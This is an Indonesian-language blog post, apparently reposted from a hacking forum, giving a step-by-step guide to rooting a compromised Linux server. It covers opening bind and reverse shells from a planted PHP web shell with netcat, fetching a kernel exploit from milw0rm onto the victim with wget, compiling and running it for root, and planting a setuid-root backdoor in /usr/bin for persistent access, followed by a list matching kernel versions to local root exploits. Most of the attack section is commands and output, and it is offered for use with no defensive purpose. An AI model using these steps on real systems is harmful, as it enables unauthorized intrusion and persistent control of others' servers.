Get Root  

Posted

(netcat hrus dah diinstall yah)


buka php-shellnya
liat yg dibagian atas ada server-ip dan your-ip
yg server ip itu ip-addressnya si target,, dan your ip itu ip address kita
klik di menu netsploit
ada dua cara koneksi (bind dan back-connect)
klo bind-connect
di server buka port dan nunggu koneksi dari kita
klo back-connect
kita buka port dan nunggu koneksi dari server...

----lanjutt
cobain yg bind-connect dulu aja
ada dua script.. satu pake perl satu lagi pake bahasa c, klo gcc di disable, pake yg perl, dan sebaliknya
oh ya,,, cari folder yg ada write permission -nya,,, klo gak nemu pindah ke /tmp/ aja
masukkin nomer port yg mau dibuka untuk listening trus pilih password , klik di tombol 'bind'
abis itu tunggu sbentar,,,
dari komputer kmu buka terminal/ms-dos prompt
trus konek pake netcat ke server
misalnya server ip nya 212.212.212.212 dan portnya 13123

$ nc 212.212.212.212 13123
bash: no job control in this shell
[ 17:37 ] nobody:/tmp$ ls
bdp
flashgot.z8t0a58f.default
gedit.ketek90.2662082588
keyring-GTMRnt
libgksu-7t347l
orbit-ketek90
orbit-root
pulse-ketek90
seahorse-0qlTmU
ssh-RnMftS5976
Tracker-ketek90.6236
virtual-ketek90.lCZNc9
[ 17:37 ] nobody:/tmp$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)


klo untuk yg back-connect dan pake router.. kmu harus set dulu port-forwarding ko ip-address kmu di jaringan,,,
misalnya ip-address kmu yg di php-shell 212.200.200.200,, nah ini namanya ip-public
yg namanya ip-private , ip lokal di jaringan bisa kmu lihat pake ifconfig atau ipconfig biasanya kyk gini 192.168.x.x atau 10.x.x.x atau 172.16-31.x.x
misalnya kmu mau pake port 13123, y udah di forward aja ke port 13123
bis itu di terminal/ms-dos prompt

keterangan:
-l --> listening (nunggu koneksi)
-p --> nomer port , kita kan pake port 13123
$ nc -l -p 13123


trus abis itu kmu ke shell php yg bagian netsploit,, yg di back-connect,, ada dua script juga, perl dan bahsa c,, cobain aja dua2nya, isi ip-nya dengan server-ip,,biasanya udah keisi secara default
bis itu langsung klik connect,
ntar di terminal muncul kyk gini...

Linux 6292 2.6.24.11-generic #1 SMP Thu Jan 29 19:24:39 UTC 2009 i686 GNU/Linux
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
$ ls
bcp
bdp
flashgot.z8t0a58f.default
gedit.ketek90.2662082588
keyring-GTMRnt
libgksu-7t347l
orbit-ketek90
orbit-root
pulse-ketek90
seahorse-0qlTmU
ssh-RnMftS5976
Tracker-ketek90.6236
virtual-ketek90.lCZNc9
$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)


nah klo udah connect,,,(mau pake bind ato back,,,)
kita coba nge-root
coba liat versi kernelnya dengan uname -a

$ uname -a
Linux 6292 2.6.24.11-generic #1 SMP Thu Jan 29 19:24:39 UTC 2009 i686 GNU/Linux


langsung ke milw0rm, search 2.6.24
mm nyam nyam,, ada dua local root exploit... yg dianelane sama jessica,,
sblum di upload ke server,, ada baiknya baca dulu tuh source-code exploitnya,,,
misalnya kita mo pake yg jessica
di source dibilang suruh compile dgn option -static -Wno-format
langsung aja dari netcat yg udah konek tadi kita download exploitnya (bisa juga diupload lewat php-shell)
misalnya kita skarang di directory /tmp/

$ wget http://www.milw0rm.com/exploits/download/5092
--2009-03-29 17:55:30-- http://www.milw0rm.com/exploits/download/5092
Resolving www.milw0rm.com... 76.74.9.18
Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: `5092'

[ <=> ] 6,292 --.-K/s in 0.1s

2009-03-29 17:55:31 (41.5 KB/s) - `5092' saved [6292]
$ ls
5092
bcp
bdp
flashgot.z8t0a58f.default
gedit.ketek90.2662082588
keyring-GTMRnt
libgksu-7t347l
orbit-ketek90
orbit-root
pulse-ketek90
seahorse-0qlTmU
ssh-RnMftS5976
Tracker-ketek90.6236
virtual-ketek90.lCZNc9


jiyah ,tuh namanya 5092,,
rubah jadi .c trus compile pake gcc dgn option -static -Wno-format

$ mv 5092 5092.c
$ gcc 5092.c -static -Wno-format
$ ls
5092.c
a.out
bcp
bdp
flashgot.z8t0a58f.default
gedit.ketek90.2662082588
keyring-GTMRnt
libgksu-7t347l
orbit-ketek90
orbit-root
pulse-ketek90
seahorse-0qlTmU
ssh-RnMftS5976
Tracker-ketek90.6236
virtual-ketek90.lCZNc9


ada file bru namanya a.out itu hasil compile dari gcc
klo mo dicompile dgn nama lain tambahin option -o
gcc 5092.c -static -Wno-format -o myexploit
klo ini ntar nongol file bru myexploit
abis compile jgn lupa rubah permissionnya supaya bisa diexecute

$ chmod +x a.out


bis itu langsung jalanin aja exploitnya

$ ./a.out


klo server vuln ntar langsung dapet root

$ id
uid=0(root) gid=0(root) groups=0(root)


klo gagal,,pke exploit yg lain,,, atu gak liat servis yg jalan di server,,,cari exploitnya,,
ingat bnyak jalan menuju ciledug

klo dah dapet root.. terserah dueh mau ngapain... hauwuwhauwhauaw...
klo aku biasanya gini
---


compile file ini..
misalnya ntar nama filenya yg udah dicompile b374k
bis itu ganti owner jadi root
$ chown root:root b374k
nah skaarng tuh file b374k owner nya root, bis itu rubah modenya supaya merubah user-level kita jadi berubah sesuai owner nya si file (tadi kan udah kita rubah owner nya jadi root), jadi walaupun kita bukan root,, trus kita jalanin file ini,, kita langsung brubah jadi root... wowwwww
$ chmod +s b374k
pindahin ke /usr/bin ato kmana gitu supaya besok2 klo datang keserver ini lagi bisa langsung dapat root..

misalnya kita connect lagi ke server... trus mau dapat root..
g usah lagi pake exploit nya..
langsung aja run dngan memanggil namanya (filenya yg tadi di /usr/bin misalnya namanya b374k)

$ b374k
bash-3.2# id
uid=0(root) gid=1000(ketek90) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(ketek90)


yihaaaaaa...


ni ada kumpulan list2 kernel dengan exploit nya,,cari aja di google/milworm exploitnya

2.4.17
newlocal
kmod


2.4.18
brk
brk2
newlocal
kmod
km.2


2.4.19
brk
brk2
newlocal
kmod
km.2


2.4.20
ptrace
kmod
ptrace-kmod
km.2
brk
brk2


2.4.21
km.2
brk
brk2
ptrace
ptrace-kmod


2.4.22
km.2
brk2
brk
ptrace
ptrace-kmod


2.4.22-10
loginx
./loginx


2.4.23
mremap_pte


2.4.24
mremap_pte
Uselib24


2.4.25-1
uselib24


2.4.27
Uselib24


2.6.0
REDHAT 6.2
REDHAT 6.2 (zoot)
SUSE 6.3
SUSE 6.4
REDHAT 6.2 (zoot)
all top from rpm
-------------------------
FreeBSD 3.4-STABLE from port
FreeBSD 3.4-STABLE from packages
freeBSD 3.4-RELEASE from port
freeBSD 4.0-RELEASE from packages
----------------------------
all with wuftpd 2.6.0;
=
wuftpd
h00lyshit


2.6.2
mremap_pte
krad
h00lyshit


2.6.5 to 2.6.10
krad
krad2
h00lyshit


2.6.8-5
krad2
./krad x
x = 1..9
h00lyshit


2.6.9-34
r00t
h00lyshit


2.6.13-17
prctl
h00lyshit

-------------------

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.11 ve 2.6.16 Arasi -> prctl, raptor, raptor2, h00lyshit
2.6.17 ve Ustlerinde -> 06 cw7.3 Jessica x x2
2.6.23 - 2.6.24 -> diane_lane_******_hard.c (http://milw0rm.com/exploits/5093)
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c (http://milw0rm.com/exploits/5092)


Di ambil dari jasakom.com
Post by :ketek
thanx to ketek,,

0 comments

Posting Komentar